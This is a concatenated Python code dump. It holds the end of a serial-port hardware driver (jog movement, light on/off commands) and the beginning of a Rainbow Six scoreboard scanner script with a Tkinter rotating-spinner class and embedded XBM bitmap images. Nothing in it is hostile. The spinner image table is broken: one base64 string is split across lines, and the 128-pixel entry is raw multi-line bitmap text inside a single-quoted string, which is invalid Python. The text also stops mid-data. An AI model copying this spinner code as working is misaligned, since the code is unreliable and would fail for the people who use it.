self.write(bytes_command)
# read finish statement
self.readline()
def __jog(self, x, y, z, button_handle):
# count, button status dependent
count = 0
# upper limit on jog repeats
while count < 1000:
if (count == 0):
self.__jogdo(x, y, z)
elif button_handle.isDown():
self.__jogdo(x, y, z)
count+=1
def jog(self, direction, button_handle):
# if not locked then jog
if not self.joglock.locked():
# get direction vector
dir_tuple = self.directions[direction]
# start jog
jogthread = Thread(target=self.__jog, args=(*dir_tuple, button_handle))
jogthread.start()
def light_on(self):
# switch light on, if not on already
if self.lightval==0:
# serial command
bytes_command = b'LON \r'
# write command
self.write(bytes_command)
# set light state as on
self.lightval = 1
# flush buffer
self.flush()
def light_off(self):
# switch light off, if not off already
if self.lightval==1:
# serial command
bytes_command = b'LOF \r'
# write command
self.write(bytes_command)
# set light state as off
self.lightval = 0
# flush buffer
self.flush()
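# Minimal usage sketch for the driver above (the serial address is hard coded in
# __init__; jog() additionally needs a GUI button handle exposing isDown()):
#
#   dd = DaisyDriver()   # opens /dev/ttyACM0 and applies the default speed
#   dd.speedset(0)       # 0, 1, 2 -> low, medium, high
#   dd.light_on()
#   dd.light_off()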
|
R6S Scoreboard Scanner.py
|
# Import modules
import cv2
import PIL
import pytesseract
import webbrowser
import os
import pyautogui
import numpy as np
import time
from PIL import ImageGrab, Image, ImageTk
import tkinter as tk
import tkinter.filedialog as filedialog
import ntpath
import win32gui
import glob
import requests
import re
import threading
import time
import base64
import sys
from tkinter import Canvas
from tkinter.constants import NW
from io import BytesIO
from tkinter import font
# Classes for the loading spinners
class RotatingIcon(Canvas):
_bind_tag_ID = 0
def __init__(self, master, filename=None, data=None, start_animation=True, time=40, **kwargs):
if data is not None:
self._image = Image.open(BytesIO(base64.b64decode(data)))
elif filename is not None:
self._image = Image.open(filename)
elif hasattr(self, "data"):
self._image = Image.open(BytesIO(base64.b64decode(self.data)))
else:
raise Exception("No image data or file")
if self._image.format == "XBM":
self._imagetk_class = ImageTk.BitmapImage
else:
self._imagetk_class = ImageTk.PhotoImage
width, height = self._image.size
self._time = time
kwargs.setdefault("width", width)
kwargs.setdefault("height", height)
kwargs.setdefault("highlightthickness", 0)
if "borderwidth" not in kwargs and "bd" not in kwargs:
kwargs["borderwidth"] = 0
Canvas.__init__(self, master, **kwargs)
self._bind_tag = "icon_rotating%s"%RotatingIcon._bind_tag_ID
RotatingIcon._bind_tag_ID += 1
self.bind_class(self._bind_tag, "<Unmap>", self._on_unmap)
self.bind_class(self._bind_tag, "<Map>", self._on_map)
self._running = False
self._is_mapped = False
if start_animation:
self.start_animation()
def _on_unmap(self, event):
self._is_mapped = False
if self._ID_of_delayed_callback is not None:
self.after_cancel(self._ID_of_delayed_callback)
def _on_map(self, event):
self._is_mapped = True
self._animate()
    def start_animation(self):
        if self._running: return
        self._running = True
new_tags = (self._bind_tag,) + self.bindtags()
self.bindtags(new_tags)
generator = self._animate_generator()
if hasattr(generator, "next"):
# Python2
self._animate = generator.next
else:
# Python3
self._animate = generator.__next__
if self._is_mapped: self._animate()
def stop_animation(self):
if not self._running: return
self._running = False
if self._ID_of_delayed_callback is not None:
self.after_cancel(self._ID_of_delayed_callback)
self._ID_of_delayed_callback = None
new_tags = self.bindtags()[1:]
self.bindtags(new_tags)
def _animate_generator(self):
angle = 0
while True:
tkimage = self._imagetk_class(self._image.rotate(angle))
canvas_obj = self.create_image(0, 0, image=tkimage, anchor=NW)
self._ID_of_delayed_callback = self.after(self._time, self._update_animation)
yield
self.delete(canvas_obj)
angle = (angle + 10) %360
def _update_animation(self):
self._ID_of_delayed_callback = self.after_idle(self._animate)
class MultiSize_RotatingIcon(RotatingIcon):
def __init__(self, master, size, start_animation=True, time=40, **kwargs):
data = self.image_per_size[size]
RotatingIcon.__init__(self, master, data=data, start_animation=start_animation, time=time, **kwargs)
class Spinner1(MultiSize_RotatingIcon):
image_per_size = {
16: 'I2RlZmluZSBpbWFnZV93aWR0aCAxNgojZGVmaW5lIGltYWdlX2hlaWdodCAxNgpzdGF0aWMgY2hhciBpbWFnZV9iaXRzW10gPSB7CjB4ZTAsMHgwMywweDE4LDB4MGUsMHgwNCwweDE4LDB4MDIsMHgzMCwweDAyLDB4MzAsMHgwMSwweDYwLDB4MDEsMHg2MCwweDAxLAoweDYwLDB4MDEsMHgyMCwweDAxLDB4MjAsMHgwMiwweDEwLDB4MDIsMHgxMCwweDA0LDB4MDgsMHgxOCwweDA0LDB4ZTAsMHgwMywKMHgwMCwweDAwCn07',
22: 'I2RlZmluZSBpbWFnZV93aWR0aCAyMgojZGVmaW5lIGltYWdlX2hlaWdodCAyMgpzdGF0aWMgY2hhciBpbWFnZV9iaXRzW10gPSB7CjB4MDAsMHgwMCwweDAwLDB4ODAsMHgzZiwweDAwLDB4ZTAsMHhmZiwweDAwLDB4NzAsMHhlMCwweDAxLDB4MTgsMHhjMCwweDAzLAoweDA0LDB4MDAsMHgwNywweDA2LDB4MDAsMHgwZSwweDAyLDB4MDAsMHgwZSwweDAxLDB4MDAsMHgxYywweDAxLDB4MDAsMHgxYywKMHgwMSwweDAwLDB4MWMsMHgwMSwweDAwLDB4MWMsMHgwMSwweDAwLDB4MDgsMHgwMSwweDAwLDB4MDQsMHgwMiwweDAwLDB4MDQsCjB4MDIsMHgwMCwweDA0LDB4MDQsMHgwMCwweDAyLDB4MGMsMHgwMCwweDAxLDB4MTgsMHg4MCwweDAwLDB4NjAsMHg2MCwweDAwLAoweDgwLDB4MWYsMHgwMCwweDAwLDB4MDAsMHgwMAp9Ow==',
24: 'I2RlZmluZSBpbWFnZV93aWR0aCAyNAojZGVmaW5lIGltYWdlX2hlaWdodCAyNApzdGF0aWMgY2hhciBpbWFnZV9iaXRzW10gPSB7CjB4MDAsMHgwMCwweDAwLDB4ODAsMHgzZiwweDAwLDB4ZTAsMHhmZiwweDAwLDB4NzgsMHhlMCwweDAzLDB4MWMsMHg4MCwweDA3LAoweDBlLDB4MDAsMHgwZiwweDA2LDB4MDAsMHgwZSwweDAzLDB4MDAsMHgxYywweDAzLDB4MDAsMHgxYywweDAxLDB4MDAsMHgzOCwKMHgwMSwweDAwLDB4MzgsMHgwMSwweDAwLDB4MzgsMHgwMSwweDAwLDB4MzgsMHgwMSwweDAwLDB4MTAsMHgwMSwweDAwLDB4MDgsCjB4MDMsMHgwMCwweDA4LDB4MDMsMHgwMCwweDA4LDB4MDMsMHgwMCwweDA0LDB4MDYsMHgwMCwweDA0LDB4MGMsMHgwMCwweDAyLAoweDE4LDB4MDAsMHgwMSwweDcwLDB4YzAsMHgwMCwweDgwLDB4M2YsMHgwMCwweDAwLDB4MDAsMHgwMAp9Ow==',
32: 'I2RlZmluZSBpbWFnZV93aWR0aCAzMgojZGVmaW5lIGltYWdlX2hlaWdodCAzMgpzdGF0aWMgY2hhciBpbWFnZV9iaXRzW10gPSB7CjB4MDAsMHgwMCwweDAwLDB4MDAsMHgwMCwweDAwLDB4MDAsMHgwMCwweDAwLDB4ZjAsMHgwZiwweDAwLDB4MDAsMHhmYywweDdmLAoweDAwLDB4MDAsMHhmZiwweGZmLDB4MDEsMHhjMCwweDBmLDB4ZjgsMHgwMywweGUwLDB4MDMsMHhjMCwweDA3LDB4ZjAsMHgwMCwKMHg4MCwweDBmLDB4NzAsMHgwMCwweDAwLDB4MWYsMHgzOCwweDAwLDB4MDAsMHgzZSwweDFjLDB4MDAsMHgwMCwweDNjLDB4MGMsCjB4MDAsMHgwMCwweDc4LDB4MGMsMHgwMCwweDAwLDB4NzgsMHgwZSwweDAwLDB4MDAsMHhmOCwweDA2LDB4MDAsMHgwMCwweGYwLAoweDA2LDB4MDAsMHgwMCwweGYwLDB4MDYsMHgwMCwweDAwLDB4ZjAsMHgwNiwweDAwLDB4MDAsMHhmMCwweDA2LDB4MDAsMHgwMCwKMHg2MCwweDA2LDB4MDAsMHgwMCwweDIwLDB4MDYsMHgwMCwweDAwLDB4MjAsMHgwYywweDAwLDB4MDAsMHgxMCwweDBjLDB4MDAsCjB4MDAsMHgxMCwweDE4LDB4MDAsMHgwMCwweDA4LDB4MTgsMHgwMCwweDAwLDB4MDgsMHgzMCwweDAwLDB4MDAsMHgwNCwweDYwLAoweDAwLDB4MDAsMHgwMiwweGMwLDB4MDAsMHgwMCwweDAxLDB4ODAsMHgwMywweDgwLDB4MDAsMHgwMCwweDFlLDB4NzAsMHgwMCwKMHgwMCwweGYwLDB4MGYsMHgwMCwweDAwLDB4MDAsMHgwMCwweDAwCn07',
48: 'I2RlZmluZSBpbWFnZV93aWR0aCA0OAojZGVmaW5lIGltYWdlX2hlaWdodCA0OApzdGF0aWMgY2hhciBpbWFnZV9iaXRzW10gPSB7CjB4MDAsMHgwMCwweDAwLDB4MDAsMHgwMCwweDAwLDB4MDAsMHgwMCwweDAwLDB4MDAsMHgwMCwweDAwLDB4MDAsMHgwMCwweDAwLAoweDAwLDB4MDAsMHgwMCwweDAwLDB4MDAsMHhmOCwweDBmLDB4MDAsMHgwMCwweDAwLDB4ODAsMHhmZiwweGZmLDB4MDAsMHgwMCwKMHgwMCwweGUwLDB4ZmYsMHhmZiwweDAzLDB4MDAsMHgwMCwweGY4LDB4ZmYsMHhmZiwweDBmLDB4MDAsMHgwMCwweGZjLDB4MDcsCjB4ZjgsMHgxZiwweDAwLDB4MDAsMHhmZSwweDAwLDB4YzAsMHg3ZiwweDAwLDB4MDAsMHgzZiwweDAwLDB4MDAsMHhmZiwweDAwLAoweDgwLDB4MGYsMHgwMCwweDAwLDB4ZmUsMHgwMSwweGMwLDB4MDcsMHgwMCwweDAwLDB4ZjgsMHgwMywweGUwLDB4MDMsMHgwMCwKMHgwMCwweGYwLDB4MDMsMHhmMCwweDAxLDB4MDAsMHgwMCwweGUwLDB4MDcsMHhmMCwweDAwLDB4MDAsMHgwMCwweGUwLDB4MGYsCjB4NzgsMHgwMCwweDAwLDB4MDAsMHhjMCwweDBmLDB4NzgsMHgwMCwweDAwLDB4MDAsMHg4MCwweDFmLDB4M2MsMHgwMCwweDAwLAoweDAwLDB4ODAsMHgxZiwweDNjLDB4MDAsMHgwMCwweDAwLDB4MDAsMHgzZiwweDFjLDB4MDAsMHgwMCwweDAwLDB4MDAsMHgzZiwKMHgxYywweDAwLDB4MDAsMHgwMCwweDAwLDB4M2YsMHgxZSwweDAwLDB4MDAsMHgwMCwweDAwLDB4N2UsMHgwZSwweDAwLDB4MDAsCjB4MDAsMHgwMCwweDdlLDB4MGUsMHgwMCwweDAwLDB4MDAsMHgwMCwweDdlLDB4MGUsMHgwMCwweDAwLDB4MDAsMHgwMCwweDdlLAoweDBlLDB4MDAsMHgwMCwweDAwLDB4MDAsMHg3ZSwweDBlLDB4MDAsMHgwMCwweDAwLDB4MDAsMHg3ZSwweDBlLDB4MDAsMHgwMCwKMHgwMCwweDAwLDB4N2UsMHgwZSwweDAwLDB4MDAsMHgwMCwweDAwLDB4M2MsMHgwZSwweDAwLDB4MDAsMHgwMCwweDAwLDB4MDgsCjB4MGMsMHgwMCwweDAwLDB4MDAsMHgwMCwweDA4LDB4MWMsMHgwMCwweDAwLDB4MDAsMHgwMCwweDA0LDB4MWMsMHgwMCwweDAwLAoweDAwLDB4MDAsMHgwNCwweDE4LDB4MDAsMHgwMCwweDAwLDB4MDAsMHgwNCwweDM4LDB4MDAsMHgwMCwweDAwLDB4MDAsMHgwMiwKMHgzMCwweDAwLDB4MDAsMHgwMCwweDAwLDB4MDIsMHg3MCwweDAwLDB4MDAsMHgwMCwweDAwLDB4MDEsMHg2MCwweDAwLDB4MDAsCjB4MDAsMHgwMCwweDAxLDB4ZTAsMHgwMCwweDAwLDB4MDAsMHg4MCwweDAwLDB4YzAsMHgwMSwweDAwLDB4MDAsMHg0MCwweDAwLAoweDgwLDB4MDMsMHgwMCwweDAwLDB4MjAsMHgwMCwweDAwLDB4MDcsMHgwMCwweDAwLDB4MTAsMHgwMCwweDAwLDB4MGUsMHgwMCwKMHgwMCwweDA4LDB4MDAsMHgwMCwweDM4LDB4MDAsMHgwMCwweDA2LDB4MDAsMHgwMCwweGUwLDB4MDAsMHg4MCwweDAxLDB4MDAsCjB4MDAsMHg4MCwweDA3LDB4NzAsMHgwMCwweDAwLDB4MDAsMHgwMCwweGZjLDB4MGYsMHgwMCwweDAwLDB4MDAsMHgwMCwweDAwLAoweDAwLDB4MDAsMHgwMAp9Ow==',
64: 'I2RlZmluZSBpbWFnZV93aWR0aCA2NAojZGVmaW5lIGltYWdlX2hlaWdodCA2NApzdGF0aWMgY2hhciBpbWFnZV9iaXRzW10gPSB7CjB4MDAsMHgwMCwweDAwLDB4MDAsMHgwMCwweDAwLDB4MDAsMHgwMCwweDAwLDB4MDAsMHgwMCwweDAwLDB4MDAsMHgwMCwweDAwLAoweDAwLDB4MDAsMHgwMCwweDAwLDB4ZjgsMHgzZiwweDAwLDB4MDAsMHgwMCwweDAwLDB4MDAsMHg4MCwweGZmLDB4ZmYsMHgwMywKMHgwMCwweDAwLDB4MDAsMHgwMCwweGYwLDB4ZmYsMHhmZiwweDFmLDB4MDAsMHgwMCwweDAwLDB4MDAsMHhmYywweGZmLDB4ZmYsCjB4N2YsMHgwMCwweDAwLDB4MDAsMHgwMCwweGZlLDB4ZmYsMHhmZiwweGZmLDB4MDEsMHgwMCwweDAwLDB4ODAsMHhmZiwweGZmLAoweGZmLDB4ZmYsMHgwMywweDAwLDB4MDAsMHhjMCwweGZmLDB4MDcsMHhlMCwweGZmLDB4MGYsMHgwMCwweDAwLDB4ZjAsMHg3ZiwKMHgwMCwweDAwLDB4ZmYsMHgxZiwweDAwLDB4MDAsMHhmOCwweDBmLDB4MDAsMHgwMCwweGZjLDB4M2YsMHgwMCwweDAwLDB4ZmMsCjB4MDcsMHgwMCwweDAwLDB4ZjAsMHg3ZiwweDAwLDB4MDAsMHhmZSwweDAxLDB4MDAsMHgwMCwweGMwLDB4ZmYsMHgwMCwweDAwLAoweGZlLDB4MDAsMHgwMCwweDAwLDB4ODAsMHhmZiwweDAxLDB4MDAsMHgzZiwweDAwLDB4MDAsMHgwMCwweDAwLDB4ZmYsMHgwMywKMHg4MCwweDFmLDB4MDAsMHgwMCwweDAwLDB4MDAsMHhmZSwweDAzLDB4ODAsMHgwZiwweDAwLDB4MDAsMHgwMCwweDAwLDB4ZmMsCjB4MDcsMHhjMCwweDBmLDB4MDAsMHgwMCwweDAwLDB4MDAsMHhmOCwweDBmLDB4ZTAsMHgwNywweDAwLDB4MDAsMHgwMCwweDAwLAoweGYwLDB4MGYsMHhlMCwweDAzLDB4MDAsMHgwMCwweDAwLDB4MDAsMHhmMCwweDFmLDB4ZjAsMHgwMywweDAwLDB4MDAsMHgwMCwKMHgwMCwweGUwLDB4MWYsMHhmMCwweDAxLDB4MDAsMHgwMCwweDAwLDB4MDAsMHhlMCwweDNmLDB4ZjAsMHgwMCwweDAwLDB4MDAsCjB4MDAsMHgwMCwweGMwLDB4M2YsMHhmOCwweDAwLDB4MDAsMHgwMCwweDAwLDB4MDAsMHhjMCwweDNmLDB4ZjgsMHgwMCwweDAwLAoweDAwLDB4MDAsMHgwMCwweDgwLDB4N2YsMHg3OCwweDAwLDB4MDAsMHgwMCwweDAwLDB4MDAsMHg4MCwweDdmLDB4NzgsMHgwMCwKMHgwMCwweDAwLDB4MDAsMHgwMCwweDgwLDB4N2YsMHg3YywweDAwLDB4MDAsMHgwMCwweDAwLDB4MDAsMHg4MCwweDdmLDB4M2MsCjB4MDAsMHgwMCwweDAwLDB4MDAsMHgwMCwweDAwLDB4ZmYsMHgzYywweDAwLDB4MDAsMHgwMCwweDAwLDB4MDAsMHgwMCwweGZmLAoweDNjLDB4MDAsMHgwMCwweDAwLDB4MDAsMHgwMCwweDAwLDB4ZmYsMHgzYywweDAwLDB4MDAsMHgwMCwweDAwLDB4MDAsMHgwMCwKMHhmZiwweDNjLDB4MDAsMHgwMCwweDAwLDB4MDAsMHgwMCwweDAwLDB4ZmYsMHgzYywweDAwLDB4MDAsMHgwMCwweDAwLDB4MDAsCjB4MDAsMHhmZiwweDNjLDB4MDAsMHgwMCwweDAwLDB4MDAsMHgwMCwweDAwLDB4ZmYsMHgzYywweDAwLDB4MDAsMHgwMCwweDAwLAoweDAwLDB4MDAsMHg3ZSwweDNjLDB4MDAsMHgwMCwweDAwLDB4MDAsMHgwMCwweDAwLDB4M2MsMHgzYywweDAwLDB4MDAsMHgwMCwKMHgwMCwweDAwLDB4MDAsMHgwOCwweDc4LDB4MDAsMHgwMCwweDAwLDB4MDAsMHgwMCwweDAwLDB4MDgsMHg3OCwweDAwLDB4MDAsCjB4MDAsMHgwMCwweDAwLDB4MDAsMHgwNCwweDc4LDB4MDAsMHgwMCwweDAwLDB4MDAsMHgwMCwweDAwLDB4MDQsMHg3OCwweDAwLAoweDAwLDB4MDAsMHgwMCwweDAwLDB4MDAsMHgwNCwweGYwLDB4MDAsMHgwMCwweDAwLDB4MDAsMHgwMCwweDAwLDB4MDQsMHhmMCwKMHgwMCwweDAwLDB4MDAsMHgwMCwweDAwLDB4MDAsMHgwMiwweGYwLDB4MDAsMHgwMCwweDAwLDB4MDAsMHgwMCwweDAwLDB4MDIsCjB4ZTAsMHgwMSwweDAwLDB4MDAsMHgwMCwweDAwLDB4MDAsMHgwMSwweGUwLDB4MDEsMHgwMCwweDAwLDB4MDAsMHgwMCwweDAwLAoweDAxLDB4YzAsMHgwMywweDAwLDB4MDAsMHgwMCwweDAwLDB4ODAsMHgwMCwweDgwLDB4MDcsMHgwMCwweDAwLDB4MDAsMHgwMCwKMHg4MCwweDAwLDB4ODAsMHgwNywweDAwLDB4MDAsMHgwMCwweDAwLDB4NDAsMHgwMCwweDAwLDB4MGYsMHgwMCwweDAwLDB4MDAsCjB4MDAsMHgyMCwweDAwLDB4MDAsMHgxZSwweDAwLDB4MDAsMHgwMCwweDAwLDB4MzAsMHgwMCwweDAwLDB4M2MsMHgwMCwweDAwLAoweDAwLDB4MDAsMHgxOCwweDAwLDB4MDAsMHg3OCwweDAwLDB4MDAsMHgwMCwweDAwLDB4MGMsMHgwMCwweDAwLDB4ZjAsMHgwMCwKMHgwMCwweDAwLDB4MDAsMHgwNiwweDAwLDB4MDAsMHhlMCwweDAzLDB4MDAsMHgwMCwweDAwLDB4MDMsMHgwMCwweDAwLDB4YzAsCjB4MDcsMHgwMCwweDAwLDB4YzAsMHgwMCwweDAwLDB4MDAsMHgwMCwweDFmLDB4MDAsMHgwMCwweDcwLDB4MDAsMHgwMCwweDAwLAoweDAwLDB4ZmMsMHgwMCwweDAwLDB4MWUsMHgwMCwweDAwLDB4MDAsMHgwMCwweGYwLDB4MDcsMHhlMCwweDA3LDB4MDAsMHgwMCwKMHgwMCwweDAwLDB4YzAsMHhmZiwweGZmLDB4MDEsMHgwMCwweDAwLDB4MDAsMHgwMCwweDAwLDB4ZmMsMHgxZiwweDAwLDB4MDAsCjB4MDAsMHgwMCwweDAwLDB4MDAsMHgwMCwweDAwLDB4MDAsMHgwMCwweDAwLDB4MDAsMHgwMCwweDAwLDB4MDAsMHgwMCwweDAwLAoweD
AwLDB4MDAKfTs=',
128: '#define image_width 128
#define image_height 128
static char image_bits[] = {
0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,
0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,
0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,
0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,
0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,
0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0xfe,0xff,0x00,
0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0xf8,0xff,0xff,
0x7f,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0xff,0xff,
0xff,0xff,0x07,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0xf0,0xff,
0xff,0xff,0xff,0x3f,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0xfc,
0xff,0xff,0xff,0xff,0xff,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,
0xff,0xff,0xff,0xff,0xff,0xff,0x07,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,
0xe0,0xff,0xff,0xff,0xff,0xff,0xff,0x1f,0x00,0x00,0x00,0x00,0x00,0x00,0x00,
0x00,0xf0,0xff,0xff,0xff,0xff,0xff,0xff,0x7f,0x00,0x00,0x00,0x00,0x00,0x00,
0x00,0x00,0xfc,0xff,0xff,0xff,0xff,0xff,0xff,0xff,0x01,0x00,0x00,0x00,0x00,
0x00,0x00,0x00,0xff,0xff,0xff,0xff,0xff,0xff,0xff,0xff,0x03,0x00,0x00,0x00,
0x00,0x00,0x00,0x80,0xff,0xff,0xff,0xff,0xff,0xff,0xff,0xff,0x0f,0x00,0x00,
0x00,0x00,0x00,0x00,0xe0,0xff,0xff,0xff,0xff,0xff,0xff,0xff,0xff,0x1f,0x00,
0x00,0x00,0x00,0x00,0x00,0xf0,0xff,0xff,0xff,0x00,0xc0,0xff,0xff,0xff,0x7f,
0x00,0x00,0x00,0x00,0x00,0x00,0xf8,0xff,0xff,0x07,0x00,0x00,0xf8,0xff,0xff,
0xff,0x00,0x00,0x00,0x00,0x00,0x00,0xfe,0xff,0x7f,0x00,0x00,0x00,0x80,0xff,
0xff,0xff,0x01,0x00,0x00,0x00,0x00,0x00,0xff,0xff,0x1f,0x00,0x00,0x00,0x00,
0xfe,0xff,0xff,0x03,0x00,0x00,0x00,0x00,0x80,0xff,0xff,0x03,0x00,0x00,0x00,
0x00,0xf0,0xff,0xff,0x07,0x00,0x00,0x00,0x00,0xc0,0xff,0xff,0x00,0x00,0x00,
0x00,0x00,0xc0,0xff,0xff,0x1f,0x00,0x00,0x00,0x00,0xe0,0xff,0x3f,0x00,0x00,
0x00,0x00,0x00,0x80,0xff,0xff,0x3f,0x00,0x00,0x00,0x00,0xf0,0xff,0x0f,0x00,
0x00,0x00,0x00,0x00,0x00,0xfe,0xff,0x7f,0x00,0x00,0x00,0x00,0xf8,0xff,0x07,
0x00,0x00,0x00,0x00,0x00,0x00,0xf8,0xff,0x7f,0x00,0x00,0x00,0x00,0xfc,0xff,
0x01,0x00,0x00,0x00,0x00,0x00,0x00,0xf0,0xff,0xff,0x00,0x00,0x00,0x00,0xfc,
0xff,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0xe0,0xff,0xff,0x01,0x00,0x00,0x00,
0xfe,0x7f,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0xc0,0xff,0xff,0x03,0x00,0x00,
0x00,0xff,0x1f,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0xff,0xff,0x07,0x00,
0x00,0x80,0xff,0x0f,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0xfe,0xff,0x0f,
0x00,0x00,0x80,0xff,0x07,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0xfc,0xff,
0x0f,0x00,0x00,0xc0,0xff,0x03,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0xf8,
0xff,0x1f,0x00,0x00,0xe0,0xff,0x01,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,
0xf0,0xff,0x3f,0x00,0x00,0xe0,0xff,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,
0x00,0xf0,0xff,0x3f,0x00,0x00,0xf0,0xff,0x00,0x00,0x00,0x00,0x00,0x00,0x00,
0x00,0x00,0xe0,0xff,0x7f,0x00,0x00,0xf0,0x7f,0x00,0x00,0x00,0x00,0x00,0x00,
0x00,0x00,0x00,0xc0,0xff,0xff,0x00,0x00,0xf8,0x3f,0x00,0x00,0x00,0x00,0x00,
0x00,0x00,0x00,0x00,0x80,0xff,0xff,0x00,0x00,0xf8,0x1f,0x00,0x00,0x00,0x00,
0x00,0x00,0x00,0x00,0x00,0x80,0xff,0xff,0x01,0x00,0xfc,0x1f,0x00,0x00,0x00,
0x00,0x00,0x00,0x00,0x00,0x00,0x00,0xff,0xff,0x01,0x00,0xfc,0x0f,0x00,0x00,
0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0xfe,0xff,0x03,0x00,0xfe,0x07,0x00,
0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0xfe,0xff,0x03,0x00,0xfe,0x07,
0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0xfc,0xff,0x07,0x00,0xff,
0x03,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0xfc,0xff,0x07,0x00,
0xff,0x03,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0xf8,0xff,0x07,
0x00,0xff,0x01,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0xf8,0xff,
0x0f,0x80,0xff,0x01,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0xf0,
0xff,0x0f,0x80,0xff,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,
0xf0,0xff,0x1f,0x80,0xff,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,
0x00,0xe0,0xff,0x1f,0xc0,0x7f,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,
0x00,0x00,0xe0,0xff,0x1f,0xc0,0x7f,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,
0x00,0x00,0x00,0xe0,0xff,0x3f,0xc0,0x7f,0x00,0x00,0x00,0x00,0x00,0x00,0x00,
0x00,0x00,0x00,0x00,0xc0,0xff,0x3f,0xc0,0x3f,0x00,0x00,0x00,0x00,0x00,0x00,
0x00,0x00,0x00,0x00,0x00,0xc0,0xff,0x3f,0xe0,0x3f,0x00,0x00,0x00,0x00,0x00,
0x00,0x00,0x00,0x00,0x00,0x00,0xc0,0xff,0x3f,0xe0,0x3f,0x00,0x00,0x00,0x00,
0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x80,0xff,0x7f,0xe0,0x1f,0x00,0x00,0x00,
0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x80,0xff,0x7f,0xe0,0x1f,0x00,0x00,
0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x80,0xff,0x7f,0xe0,0x1f,0x00,
0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x80,0xff,0x7f,0xe0,0x1f,
0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x80,0xff,0x7f,0xf0,
0x1f,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x80,0xff,0xff,
0xf0,0x0f,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0xff,
0xff,0xf0,0x0f,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,
0xff,0xff,0xf0,0x0f,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,
0x00,0xff,0xff,0xf0,0x0f,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,
0x00,0x00,0xff,0xff,0xf0,0x0f,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,
0x00,0x00,0x00,0xff,0xff,0xf0,0x0f,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,
0x00,0x00,0x00,0x00,0xff,0xff,0xf0,0x0f,0x00,0x00,0x00,0x00,0x00,0x00,0x00,
0x00,0x00,0x00,0x00,0x00,0xff,0xff,0xf0,0x0f,0x00,0x00,0x00,0x00,0x00,0x00,
0x00,0x00,0x00,0x00,0x00,0x00,0xff,0xff,0xf0,0x0f,0x00,0x00,0x00,0x00,0x00,
0x00,0x00,0x00,0x00,0x00,0x00,0x00,0xff,0xff,0xf0,0x0f,0x00,0x00,0x00,0x00,
0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0xff,0xff,0xf0,0x0f,0x00,0x00,0x00,
0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0xff,0xff,0xf0,0x0f,0x00,0x00,
0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0xfe,0x7f,0xf0,0x0f,0x00,
0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0xfc,0x3f,0xf0,0x0f,
0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0xf8,0x3f,0xf0,
0x0f,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0xf0,0x0f,
0xe0,0x1f,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x80,
0x01,0xe0,0x1f,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,
0x40,0x00,0xe0,0x1f,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,
0x00,0x40,0x00,0xe0,0x1f,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,
